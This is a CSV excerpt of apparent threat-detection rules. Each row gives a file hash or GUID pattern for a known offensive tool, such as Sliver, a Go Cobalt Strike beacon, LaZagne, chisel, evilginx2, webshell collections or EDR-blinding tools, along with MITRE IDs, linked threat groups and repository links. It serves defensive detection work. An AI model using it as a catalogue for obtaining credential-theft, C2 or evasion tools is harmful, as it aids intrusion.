"*75e409f0ea3bfc0d705982be384a2a2da1262415fef8b0c253fd9821f9673bf6*",".{0,1000}75e409f0ea3bfc0d705982be384a2a2da1262415fef8b0c253fd9821f9673bf6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29141"
"*75E5F9A0-8D69-4426-9F16-4A65E941974D*",".{0,1000}75E5F9A0\-8D69\-4426\-9F16\-4A65E941974D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29142"
"*75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce*",".{0,1000}75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29144"
"*75f068e65a36c0dfcd7b59c00ab3a0e73f6bc07ca84091f472caada25e32cfcd*",".{0,1000}75f068e65a36c0dfcd7b59c00ab3a0e73f6bc07ca84091f472caada25e32cfcd.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","29146"
"*75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc*",".{0,1000}75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29147"
"*75f525cfddff5015fe3aada97fd9ed1b51657297f1f5fa494c3b73ad7766105a*",".{0,1000}75f525cfddff5015fe3aada97fd9ed1b51657297f1f5fa494c3b73ad7766105a.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29148"
"*7607CC54-D49D-4004-8B20-15555D58C842*",".{0,1000}7607CC54\-D49D\-4004\-8B20\-15555D58C842.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","29149"
"*760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d*",".{0,1000}760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29150"
"*760c4649c5acd734d931ee64ebfc62eb19fa5c45137f4712b84aba7a356cda91*",".{0,1000}760c4649c5acd734d931ee64ebfc62eb19fa5c45137f4712b84aba7a356cda91.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","#filehash","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","29151"
"*7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43*",".{0,1000}7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29152"
"*761284ad40b1ab849db7298733b7573b507e94c09378df84b93ce1fcb06ac6b1*",".{0,1000}761284ad40b1ab849db7298733b7573b507e94c09378df84b93ce1fcb06ac6b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29153"
"*7617851366772c98b3aae629f0ec8e63a7863c279e2d8f40875f3c6a50aa0a9f*",".{0,1000}7617851366772c98b3aae629f0ec8e63a7863c279e2d8f40875f3c6a50aa0a9f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29155"
"*7623e9f7b2c73cb0dba8415eea6c5ec6534cc1716e314ce49f53951b4968a334*",".{0,1000}7623e9f7b2c73cb0dba8415eea6c5ec6534cc1716e314ce49f53951b4968a334.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29157"
"*762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121*",".{0,1000}762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29159"
"*76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83*",".{0,1000}76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","29160"
"*7634e6e941bfe0dc600529f03df81785c3f7af96e0b2bdf3f00042318970c538*",".{0,1000}7634e6e941bfe0dc600529f03df81785c3f7af96e0b2bdf3f00042318970c538.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29161"
"*763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2*",".{0,1000}763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29162"
"*7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36*",".{0,1000}7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29165"
"*7648b89b79e72510063a89ad60d807515bea5b595d1dac15891abe1981484e65*",".{0,1000}7648b89b79e72510063a89ad60d807515bea5b595d1dac15891abe1981484e65.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29166"
"*764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3*",".{0,1000}764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29167"
"*7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40*",".{0,1000}7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29168"
"*76571d635c03a27b42b9f28e8148012ee086518932b57e269685b0cad0148336*",".{0,1000}76571d635c03a27b42b9f28e8148012ee086518932b57e269685b0cad0148336.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29170"
"*7659d716099e476c563374bd557a93f1c5281844ebd93900cc2f97bc759744b6*",".{0,1000}7659d716099e476c563374bd557a93f1c5281844ebd93900cc2f97bc759744b6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29171"
"*765a18c16ac5311b5b5b9c0c3e553e88a7d015322b32eef20989dcefd66c565e*",".{0,1000}765a18c16ac5311b5b5b9c0c3e553e88a7d015322b32eef20989dcefd66c565e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29172"
"*765C5755-DBE9-4AB5-9427-921D0E46F9F0*",".{0,1000}765C5755\-DBE9\-4AB5\-9427\-921D0E46F9F0.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#GUIDproject","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","29173"
"*7665f456d4b6dd682580898bf304b351b196a1913f3687134478eea4e42a2600*",".{0,1000}7665f456d4b6dd682580898bf304b351b196a1913f3687134478eea4e42a2600.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29174"
"*766853465051ea9902106a4f90e84bf5b2bd3f4573f591b02f3882b13beafe85*",".{0,1000}766853465051ea9902106a4f90e84bf5b2bd3f4573f591b02f3882b13beafe85.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29175"
"*766d3edb5d2d7129684f21642e1dff9a736583d3e4cc4949c23027803412faa9*",".{0,1000}766d3edb5d2d7129684f21642e1dff9a736583d3e4cc4949c23027803412faa9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29177"
"*7678743a1980ea6c51d430208bf80860d45abf792864ec321c7f1680eff89746*",".{0,1000}7678743a1980ea6c51d430208bf80860d45abf792864ec321c7f1680eff89746.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29178"
"*767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d*",".{0,1000}767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29179"
"*76999803e6f8b74f33be250e048d6ef124925cd8919d57a22feef1ed5548a7fa*",".{0,1000}76999803e6f8b74f33be250e048d6ef124925cd8919d57a22feef1ed5548a7fa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29183"
"*76a3395be39125fa1185032ca854ebd68bcb2229fa6802d9012bddcbe3b1f2ac*",".{0,1000}76a3395be39125fa1185032ca854ebd68bcb2229fa6802d9012bddcbe3b1f2ac.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29185"
"*76a92f0af17e901f6a96d4a1747fa67bab25d2d9a154039742351930865d1bf9*",".{0,1000}76a92f0af17e901f6a96d4a1747fa67bab25d2d9a154039742351930865d1bf9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29187"
"*76a9aef76f34f01a3f20cfb3a72fc17340840d07b3acb74e50a9cb1bd0ecc840*",".{0,1000}76a9aef76f34f01a3f20cfb3a72fc17340840d07b3acb74e50a9cb1bd0ecc840.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","29188"
"*76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e*",".{0,1000}76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","29189"
"*76b716279c94bd8e32e1e360ddf0994a74ad51bc6fb094a41f11163aef901116*",".{0,1000}76b716279c94bd8e32e1e360ddf0994a74ad51bc6fb094a41f11163aef901116.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29190"
"*76c228ff4ca867c361bb5271c961092659ccabe899a45a46e1b0889f0a2e9ec7*",".{0,1000}76c228ff4ca867c361bb5271c961092659ccabe899a45a46e1b0889f0a2e9ec7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29191"
"*76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5*",".{0,1000}76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29192"
"*76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc*",".{0,1000}76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","29193"
"*76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60*",".{0,1000}76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29197"
"*76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca*",".{0,1000}76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29198"
"*76d9173d54c6b86022b37c6f8cb1b1585f5613b158c2e6e2baf6ccf45937f234*",".{0,1000}76d9173d54c6b86022b37c6f8cb1b1585f5613b158c2e6e2baf6ccf45937f234.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29199"
"*76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51*",".{0,1000}76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29200"
"*76dc564506eb2419fffad94ca1eafd192f053261ec01d97848a259d15698d520*",".{0,1000}76dc564506eb2419fffad94ca1eafd192f053261ec01d97848a259d15698d520.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","29202"
"*76de1ef6c3d47c7d2b1c05d493b60d2a846b45b7ab4c7fa162e54a94c24c2960*",".{0,1000}76de1ef6c3d47c7d2b1c05d493b60d2a846b45b7ab4c7fa162e54a94c24c2960.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29203"
